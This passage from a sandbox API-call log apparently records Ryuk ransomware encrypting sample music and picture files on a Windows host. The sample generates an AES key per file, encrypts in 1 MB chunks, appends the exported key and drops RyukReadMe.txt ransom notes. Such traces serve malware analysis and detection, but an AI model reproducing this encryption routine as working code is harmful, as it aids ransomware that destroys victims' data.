lpBuffer=0x29ac870*, lpNumberOfBytesWritten=0x29ac834*=0xa, lpOverlapped=0x0) returned 1 [0160.149] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac840 | out: pbData=0x0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0160.149] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac8c0, pdwDataLen=0x29ac840 | out: pbData=0x29ac8c0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0160.149] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac8c0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac8c0*, lpNumberOfBytesWritten=0x29ac834*=0x10c, lpOverlapped=0x0) returned 1 [0160.149] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2 | out: lpNewFilePointer=0x0) returned 1 [0160.149] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac888*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x29ac858, lpOverlapped=0x0 | out: lpBuffer=0x29ac888*, lpNumberOfBytesWritten=0x29ac858*=0x10, lpOverlapped=0x0) returned 1 [0160.149] CloseHandle (hObject=0x18c) returned 1 [0160.150] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0160.153] CryptDestroyKey (hKey=0x3b8690) returned 1 [0160.154] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0160.154] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0160.154] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0160.154] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3", dwFileAttributes=0x80) returned 1 [0160.157] CreateFileW (lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3" (normalized: "c:\\users\\public\\music\\sample music\\maid with the flaxen hair.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0160.157] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=4113874) returned 1 [0160.157] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=4113874) returned 1 [0160.157] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x3ec4b0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0160.157] ReadFile (in: hFile=0x18c, lpBuffer=0x29ac898, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac858, lpOverlapped=0x0 | out: lpBuffer=0x29ac898*, lpNumberOfBytesRead=0x29ac858*=0x19, lpOverlapped=0x0) returned 1 [0160.159] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.159] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac820 | out: phKey=0x29ac820*=0x3b8690) returned 1 [0160.159] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0160.159] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.159] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0xf4240, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0xf4240, lpOverlapped=0x0) returned 1 [0160.177] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240) returned 1 [0160.177] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0xf4240, dwBufLen=0xf4240 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0xf4240) returned 1 [0160.182] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.182] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xf4240, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0xf4240, lpOverlapped=0x0) returned 1 [0160.185] SetFilePointer (in: hFile=0x18c, lDistanceToMove=1000000, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf4240 [0160.185] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0xf4240, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0xf4240, lpOverlapped=0x0) returned 1 [0160.201] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240) returned 1 [0160.201] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0xf4240, dwBufLen=0xf4240 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0xf4240) returned 1 [0160.207] SetFilePointer (in: hFile=0x18c, lDistanceToMove=1000000, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf4240 [0160.207] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xf4240, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0xf4240, lpOverlapped=0x0) returned 1 [0160.210] SetFilePointer (in: hFile=0x18c, lDistanceToMove=2000000, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1e8480 [0160.210] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0xf4240, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0xf4240, lpOverlapped=0x0) returned 1 [0160.233] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240) returned 1 [0160.233] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0xf4240, dwBufLen=0xf4240 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0xf4240) returned 1 [0160.240] SetFilePointer (in: hFile=0x18c, lDistanceToMove=2000000, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1e8480 [0160.240] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xf4240, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0xf4240, lpOverlapped=0x0) returned 1 [0160.243] SetFilePointer (in: hFile=0x18c, lDistanceToMove=3000000, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2dc6c0 [0160.244] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0xf4240, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0xf4240, lpOverlapped=0x0) returned 1 [0160.254] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240) returned 1 [0160.254] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0xf4240, dwBufLen=0xf4240 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0xf4240) returned 1 [0160.260] SetFilePointer (in: hFile=0x18c, lDistanceToMove=3000000, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2dc6c0 [0160.260] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xf4240, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0xf4240, lpOverlapped=0x0) returned 1 [0160.264] SetFilePointer (in: hFile=0x18c, lDistanceToMove=4000000, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3d0900 [0160.264] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0x1bcd2, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0x1bcd2, lpOverlapped=0x0) returned 1 [0160.264] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4250) returned 1 [0160.264] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0x1bcd2, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0x1bce0) returned 1 [0160.265] SetFilePointer (in: hFile=0x18c, lDistanceToMove=4000000, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3d0900 [0160.265] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x1bce0, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0x1bce0, lpOverlapped=0x0) returned 1 [0160.266] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac870*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac870*, lpNumberOfBytesWritten=0x29ac834*=0x6, lpOverlapped=0x0) returned 1 [0160.266] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac840 | out: pbData=0x0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0160.266] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac8c0, pdwDataLen=0x29ac840 | out: pbData=0x29ac8c0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0160.266] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac8c0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac8c0*, lpNumberOfBytesWritten=0x29ac834*=0x10c, lpOverlapped=0x0) returned 1 [0160.266] CloseHandle (hObject=0x18c) returned 1 [0160.266] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0160.271] CryptDestroyKey (hKey=0x3b8690) returned 1 [0160.271] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0160.271] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0160.271] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0160.271] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3", dwFileAttributes=0x80) returned 1 [0160.272] CreateFileW (lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3" (normalized: "c:\\users\\public\\music\\sample music\\sleep away.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0160.272] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=4842585) returned 1 [0160.272] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=4842585) returned 1 [0160.272] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x49e337, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0160.272] ReadFile (in: hFile=0x18c, lpBuffer=0x29ac898, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac858, lpOverlapped=0x0 | out: lpBuffer=0x29ac898*, lpNumberOfBytesRead=0x29ac858*=0x19, lpOverlapped=0x0) returned 1 [0160.273] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.273] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac820 | out: phKey=0x29ac820*=0x3b8690) returned 1 [0160.273] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0160.274] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.274] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0xf4240, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0xf4240, lpOverlapped=0x0) returned 1 [0160.294] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240) returned 1 [0160.294] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0xf4240, dwBufLen=0xf4240 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0xf4240) returned 1 [0160.301] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.301] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xf4240, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0xf4240, lpOverlapped=0x0) returned 1 [0160.308] SetFilePointer (in: hFile=0x18c, lDistanceToMove=1000000, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf4240 [0160.308] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0xf4240, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0xf4240, lpOverlapped=0x0) returned 1 [0160.326] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240) returned 1 [0160.326] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0xf4240, dwBufLen=0xf4240 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0xf4240) returned 1 [0160.334] SetFilePointer (in: hFile=0x18c, lDistanceToMove=1000000, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf4240 [0160.334] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xf4240, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0xf4240, lpOverlapped=0x0) returned 1 [0160.338] SetFilePointer (in: hFile=0x18c, lDistanceToMove=2000000, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1e8480 [0160.338] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0xf4240, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0xf4240, lpOverlapped=0x0) returned 1 [0160.368] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240) returned 1 [0160.368] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0xf4240, dwBufLen=0xf4240 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0xf4240) returned 1 [0160.375] SetFilePointer (in: hFile=0x18c, lDistanceToMove=2000000, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1e8480 [0160.375] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xf4240, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0xf4240, lpOverlapped=0x0) returned 1 [0160.379] SetFilePointer (in: hFile=0x18c, lDistanceToMove=3000000, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2dc6c0 [0160.379] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0xf4240, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0xf4240, lpOverlapped=0x0) returned 1 [0160.393] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240) returned 1 [0160.393] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0xf4240, dwBufLen=0xf4240 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0xf4240) returned 1 [0160.398] SetFilePointer (in: hFile=0x18c, lDistanceToMove=3000000, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2dc6c0 [0160.398] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xf4240, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0xf4240, lpOverlapped=0x0) returned 1 [0160.401] SetFilePointer (in: hFile=0x18c, lDistanceToMove=4000000, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3d0900 [0160.401] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0xcdb59, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0xcdb59, lpOverlapped=0x0) returned 1 [0160.411] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4250) returned 1 [0160.411] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0xcdb59, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0xcdb60) returned 1 [0160.416] SetFilePointer (in: hFile=0x18c, lDistanceToMove=4000000, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3d0900 [0160.416] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xcdb60, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0xcdb60, lpOverlapped=0x0) returned 1 [0160.418] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac870*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac870*, lpNumberOfBytesWritten=0x29ac834*=0x6, lpOverlapped=0x0) returned 1 [0160.419] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac840 | out: pbData=0x0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0160.419] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac8c0, pdwDataLen=0x29ac840 | out: pbData=0x29ac8c0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0160.419] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac8c0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac8c0*, lpNumberOfBytesWritten=0x29ac834*=0x10c, lpOverlapped=0x0) returned 1 [0160.419] CloseHandle (hObject=0x18c) returned 1 [0160.419] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0160.423] CryptDestroyKey (hKey=0x3b8690) returned 1 [0160.423] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0160.423] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0160.423] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0160.424] SetLastError (dwErrCode=0x0) [0160.424] CreateFileW (lpFileName="C:\\Users\\Public\\Music\\Sample Music\\RyukReadMe.txt" (normalized: "c:\\users\\public\\music\\sample music\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0160.424] GetLastError () returned 0x0 [0160.424] WriteFile (in: hFile=0x188, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ad1f0*=0x320, lpOverlapped=0x0) returned 1 [0160.425] CloseHandle (hObject=0x188) returned 1 [0160.425] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0 [0160.425] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0160.425] SetLastError (dwErrCode=0x0) [0160.425] CreateFileW (lpFileName="C:\\Users\\Public\\Music\\RyukReadMe.txt" (normalized: "c:\\users\\public\\music\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0160.425] GetLastError () returned 0xb7 [0160.425] CloseHandle (hObject=0x184) returned 1 [0160.425] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0160.425] SetLastError (dwErrCode=0x0) [0160.425] CreateFileW (lpFileName="C:\\Users\\Public\\RyukReadMe.txt" (normalized: "c:\\users\\public\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0160.425] GetLastError () returned 0xb7 [0160.425] CloseHandle (hObject=0x184) returned 1 [0160.425] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Pictures\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0x3a2dc0 [0160.425] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0160.425] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0160.425] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0160.425] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0160.425] SetLastError (dwErrCode=0x0) [0160.425] CreateFileW (lpFileName="C:\\Users\\Public\\Pictures\\RyukReadMe.txt" (normalized: "c:\\users\\public\\pictures\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0160.426] GetLastError () returned 0xb7 [0160.426] CloseHandle (hObject=0x188) returned 1 [0160.426] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0160.427] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0160.427] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0160.427] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0160.427] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg", dwFileAttributes=0x80) returned 1 [0160.428] CreateFileW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\chrysanthemum.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0160.428] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=879394) returned 1 [0160.428] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=879394) returned 1 [0160.428] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0xd6a00, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0160.428] ReadFile (in: hFile=0x18c, lpBuffer=0x29ac898, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac858, lpOverlapped=0x0 | out: lpBuffer=0x29ac898*, lpNumberOfBytesRead=0x29ac858*=0x19, lpOverlapped=0x0) returned 1 [0160.429] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.429] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac820 | out: phKey=0x29ac820*=0x3b8690) returned 1 [0160.429] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, 